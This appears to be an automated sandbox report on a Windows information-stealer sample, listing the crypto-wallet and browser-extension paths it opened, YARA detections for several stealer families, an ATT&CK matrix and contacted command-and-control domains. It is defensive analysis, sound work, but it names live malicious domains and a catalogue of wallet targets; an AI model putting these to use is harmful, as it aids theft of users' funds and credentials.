Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior

Source: Yara match	File source: 00000008.00000002.2498975531.0000000000CD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7984, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 4.2.AddInProcess32.exe.3939ec0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3939ec0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3afcb18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3ad4af8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3ad4af8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3afcb18.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2503804828.0000000003849000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2478972783.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2503804828.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2503804828.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 4.2.AddInProcess32.exe.3939ec0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3939ec0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3afcb18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3ad4af8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3ad4af8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3afcb18.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2503804828.0000000003849000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2478972783.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2503804828.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2503804828.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: 4.2.AddInProcess32.exe.3939ec0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3939ec0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3afcb18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3ad4af8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3ad4af8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3afcb18.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	11 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	1 Valid Accounts	1 Valid Accounts	111 Deobfuscate/Decode Files or Information	11 Input Capture	12 System Information Discovery	Remote Desktop Protocol	31 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Access Token Manipulation	3 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	312 Process Injection	1 Install Root Certificate	NTDS	211 Security Software Discovery	Distributed Component Object Model	11 Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Software Packing	LSA Secrets	2 Process Discovery	SSH	2 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	131 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Valid Accounts	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	131 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	312 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Hidden Files and Directories	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
2M1NS61GG8.exe	39%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
2M1NS61GG8.exe	32%	Virustotal		Browse
2M1NS61GG8.exe	100%	Avira	HEUR/AGEN.1361785
2M1NS61GG8.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
https://api.ip.sb/ip	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://purl.oen	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
pushjellysingeywus.shop	2%	Virustotal		Browse
wifeplasterbakewis.shop	2%	Virustotal		Browse
http://www.founder.com.cn/cn/bThe	0%	Virustotal		Browse
http://kolbi.cz	0%	Virustotal		Browse
http://www.founder.com.cn/cn/cThe	0%	Virustotal		Browse
economicscreateojsu.shop	13%	Virustotal		Browse
http://www.founder.com.cn/cn	0%	Virustotal		Browse
https://discord.com/api/v9/users/	0%	Virustotal		Browse
bordersoarmanusjuw.shop	2%	Virustotal		Browse
https://www.anon.com/frit/asfta.dara	0%	Virustotal		Browse
http://www.zhongyicts.com.cn	1%	Virustotal		Browse
mealplayerpreceodsju.shop	18%	Virustotal		Browse
absentconvicsjawun.shop	2%	Virustotal		Browse
entitlementappwo.shop	17%	Virustotal		Browse
suitcaseacanehalk.shop	2%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
rocketmusclesksj.shop	172.67.129.243	true	true		unknown
i.ibb.co	169.197.85.95	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
pushjellysingeywus.shop	true	2%, Virustotal, Browse	unknown
rocketmusclesksj.shop	true		unknown
https://i.ibb.co/bLNQtdR/1667-Final.webp	false		high
bordersoarmanusjuw.shop	true	2%, Virustotal, Browse	unknown
economicscreateojsu.shop	true	13%, Virustotal, Browse	unknown
wifeplasterbakewis.shop	true	2%, Virustotal, Browse	unknown
https://rocketmusclesksj.shop/api	false		unknown
suitcaseacanehalk.shop	true	2%, Virustotal, Browse	unknown
entitlementappwo.shop	true	17%, Virustotal, Browse	unknown
mealplayerpreceodsju.shop	true	18%, Virustotal, Browse	unknown
absentconvicsjawun.shop	true	2%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ip.sb/ip	InstallUtil.exe, 00000009.00000002.2485480778.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/?	2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://www.fontbureau.com/designers?	2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false		high
https://rocketmusclesksj.shop/%	AddInProcess32.exe, 00000008.00000002.2498975531.0000000000CD9000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.tiro.com	2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ip.s	InstallUtil.exe, 00000009.00000002.2485480778.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com/designers	2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://purl.oen	AddInProcess32.exe, 00000004.00000002.2516044388.0000000005C44000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://kolbi.cz	2M1NS61GG8.exe	false	0%, Virustotal, Browse	unknown
http://www.typography.netD	2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://www.galapagosdesign.com/staff/dennis.htm	2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://www.fontbureau.com/designers/frere-user.html	2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false		high
https://i.ibb.co	2M1NS61GG8.exe, 00000000.00000002.2412254219.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://rocketmusclesksj.shop/api.	AddInProcess32.exe, 00000008.00000002.2498975531.0000000000C88000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.jiyu-kobo.co.jp/	2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://discord.com/api/v9/users/	InstallUtil.exe, 00000009.00000002.2485480778.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://www.galapagosdesign.com/DPlease	2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.anon.com/frit/asfta.dara	2M1NS61GG8.exe, 00000000.00000002.2412254219.0000000003110000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://www.fonts.com	2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	2M1NS61GG8.exe, 00000000.00000002.2412254219.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://rocketmusclesksj.shop/0	AddInProcess32.exe, 00000008.00000002.2502297595.0000000002E14000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://rocketmusclesksj.shop:443/api	AddInProcess32.exe, 00000008.00000002.2498975531.0000000000CD9000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
8.8.8.8	unknown	United States	15169	GOOGLEUS	false
172.67.129.243	rocketmusclesksj.shop	United States	13335	CLOUDFLARENETUS	true
169.197.85.95	i.ibb.co	United States	26548	PUREVOLTAGE-INCUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1429054
Start date and time:	2024-04-20 13:21:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	2M1NS61GG8.exe renamed because original name is a hash value
Original Sample Name:	c7eea9d0d8f7bf74bd7c25990458bcf8.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@12/7@2/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 266 Number of non-executed functions: 94
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:21:59	API Interceptor	212267x Sleep call for process: 2M1NS61GG8.exe modified
13:23:15	API Interceptor	6x Sleep call for process: AddInProcess32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
169.197.85.95	notepad.txt	Get hash	malicious	HTMLPhisher	Browse
	https://groun-93ed.ehajdranrsuw.workers.dev/	Get hash	malicious	HTMLPhisher	Browse
	https://emaut-27ef.orlvrbliillroeo.workers.dev/	Get hash	malicious	HTMLPhisher	Browse
	https://imgern-ee14.earyllofeprir.workers.dev/	Get hash	malicious	HTMLPhisher	Browse
	https://yesterwebring.neocities.org	Get hash	malicious	Phisher	Browse
	http://sellugsk.live	Get hash	malicious	Unknown	Browse
	https://dhlpaketzoll.sviluppo.host/Paket/	Get hash	malicious	Unknown	Browse
	(No subject) (2).eml	Get hash	malicious	HTMLPhisher	Browse
	https://objectstorage.sa-saopaulo-1.oraclecloud.com/n/grnf1myuo7lg/b/bucket-20240402-0423/o/indexsmoke.html	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse
	https://haluuu.aardhnrscidcahr.workers.dev/	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
i.ibb.co	notepad.txt	Get hash	malicious	HTMLPhisher	Browse	169.197.85.95
	https://groun-93ed.ehajdranrsuw.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	169.197.85.95
	https://cloudde-e0e7.samariakurtz.workers.dev/633c62d4-5847-4578-aefc-6b70c4961623	Get hash	malicious	HTMLPhisher	Browse	172.96.160.168
	https://enjucm-6424.anotudhoeah.workers.dev/8dc0c739-61df-4e9d-9bd9-b5bc957356bf	Get hash	malicious	HTMLPhisher	Browse	172.96.160.183
	https://emaut-27ef.orlvrbliillroeo.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	169.197.85.95
	https://imgern-ee14.earyllofeprir.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	169.197.85.95
	https://yesterwebring.neocities.org	Get hash	malicious	Phisher	Browse	169.197.85.95
	http://sellugsk.live	Get hash	malicious	Unknown	Browse	169.197.85.95
	https://dhlpaketzoll.sviluppo.host/Paket/	Get hash	malicious	Unknown	Browse	169.197.85.95
	(No subject) (2).eml	Get hash	malicious	HTMLPhisher	Browse	169.197.85.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PUREVOLTAGE-INCUS	notepad.txt	Get hash	malicious	HTMLPhisher	Browse	169.197.85.95
	https://groun-93ed.ehajdranrsuw.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	169.197.85.95
